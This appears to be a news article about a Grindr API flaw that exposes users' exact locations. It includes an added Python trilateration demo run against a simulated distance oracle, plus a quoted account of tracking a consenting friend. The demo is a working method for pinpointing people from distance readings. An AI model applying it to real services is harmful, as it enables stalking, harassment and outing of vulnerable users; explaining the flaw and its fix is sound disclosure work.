Grindr, a social networking app for the LGBTQ community, continues to struggle with API security. Earlier this year, a security flaw in Grindr's public API exposed users' location information even when they had disabled location sharing in their app settings. The same flaw made it possible to build an app that told Grindr users who had blocked them. Now a flaw in Grindr's private API has been reported.
The latest flaw lets third parties determine the precise location of any given Grindr user. The private API in question does not restrict third-party access, and by applying trilateration to the distances it reports, developers have built apps that expose a user's location. One such app exploiting the flaw was published in a GitHub repository, which has since been removed.
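To show why a "distance to this user" value is enough to leak a position, here is an added worked example of the trilateration technique mentioned above. It is not code from the original report, from Queer Europe or from Grindr, and it does not talk to any real API: the distance oracle below is a constructed stand-in that models only what such a feature must do (return the distance between the querying client's self-reported position and the target). The target coordinates and the three probe positions are made up. The attack generalises to any distance oracle where the client controls its own reported position: query it from three non-collinear spoofed positions, then intersect the three circles.

```python
import math

EARTH_R = 6_371_000.0                 # mean Earth radius, metres
M_PER_DEG = EARTH_R * math.pi / 180   # metres per degree of latitude

# Constructed values for the demonstration; not a real user or real probe sites.
TARGET = (52.3720, 4.8960)            # hypothetical target position (lat, lon)
PROBES = [(52.3700, 4.8900),          # hypothetical spoofed attacker positions
          (52.3750, 4.8900),
          (52.3700, 4.9000)]


def haversine_m(a, b):
    """Great-circle distance in metres between two (lat, lon) points."""
    lat1, lon1 = map(math.radians, a)
    lat2, lon2 = map(math.radians, b)
    h = (math.sin((lat2 - lat1) / 2) ** 2
         + math.cos(lat1) * math.cos(lat2) * math.sin((lon2 - lon1) / 2) ** 2)
    return 2 * EARTH_R * math.asin(math.sqrt(h))


def simulated_distance_oracle(claimed_position):
    """Stand-in for a 'distance to this user' response (constructed, not Grindr's API).

    It models the only thing such a feature needs to leak: given the querying
    client's self-reported position, the server returns the distance to the target.
    """
    return haversine_m(claimed_position, TARGET)


def to_local(point, origin):
    """Project (lat, lon) onto a flat x/y plane in metres centred on origin.

    Equirectangular approximation: accurate to well under a metre over a few km.
    """
    (lat, lon), (lat0, lon0) = point, origin
    x = (lon - lon0) * M_PER_DEG * math.cos(math.radians(lat0))
    y = (lat - lat0) * M_PER_DEG
    return x, y


def from_local(xy, origin):
    """Inverse of to_local."""
    (x, y), (lat0, lon0) = xy, origin
    return (lat0 + y / M_PER_DEG,
            lon0 + x / (M_PER_DEG * math.cos(math.radians(lat0))))


def trilaterate(probes):
    """Solve for the point at the given distances from three probe positions.

    probes: list of three ((lat, lon), distance_m) tuples.
    Subtracting the circle equations pairwise removes the quadratic terms and
    leaves two linear equations in the unknown (x, y).
    """
    origin = probes[0][0]
    (x1, y1), (x2, y2), (x3, y3) = (to_local(p, origin) for p, _ in probes)
    r1, r2, r3 = (d for _, d in probes)
    a, b = 2 * (x2 - x1), 2 * (y2 - y1)
    c = r1**2 - r2**2 - x1**2 + x2**2 - y1**2 + y2**2
    d, e = 2 * (x3 - x2), 2 * (y3 - y2)
    f = r2**2 - r3**2 - x2**2 + x3**2 - y2**2 + y3**2
    det = a * e - b * d
    if abs(det) < 1e-9:
        raise ValueError("probe positions are collinear; pick a third point off the line")
    x = (c * e - b * f) / det
    y = (a * f - c * d) / det
    return from_local((x, y), origin)


def locate_target(oracle, probe_positions):
    """Query the distance oracle from each spoofed position, then trilaterate."""
    readings = [(p, oracle(p)) for p in probe_positions]
    return trilaterate(readings)


if __name__ == "__main__":
    est = locate_target(simulated_distance_oracle, PROBES)
    print("estimate:", est, "error (m):", round(haversine_m(est, TARGET), 3))
```

The three probe positions must not lie on one line, otherwise the two circle-difference equations are dependent and the solver rejects them. Coarsening the returned distance (rounding to tens or hundreds of metres) widens the error but does not remove the leak, since an attacker can take more probes and narrow the intersection region; the fix is to stop answering distance queries for clients the user has not chosen to share with.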
Queer Europe reported the flaw and tested how it could be exploited:
Besides mapping queer communities, it is also possible to search for the location of an individual user, even if you have no idea where this user is at that particular moment. After you have interacted with a user, for example through a chat message, you can continue to geolocate them later, whenever they share their distance online. As an experiment, a friend allowed me to track him during a Saturday night out. While sitting behind my laptop, I could see in which restaurants he was eating, in which cafes he was drinking, and in which nightclubs he was dancing. I could also see that he went to the gay sauna at 1 a.m. and then slept at a stranger’s house at 3 a.m. By making it so easy to track individuals with precision, Grindr makes its users extremely vulnerable to harassment and stalking.
Queer Europe says the flaw pins a user's location down to within 2 to 5 meters, and regards this as more than a privacy and internet-security issue: its report stresses the harassment and stalking the API flaw makes possible. Grindr responded to the earlier concern via Twitter; stay tuned for a similar response to this incident.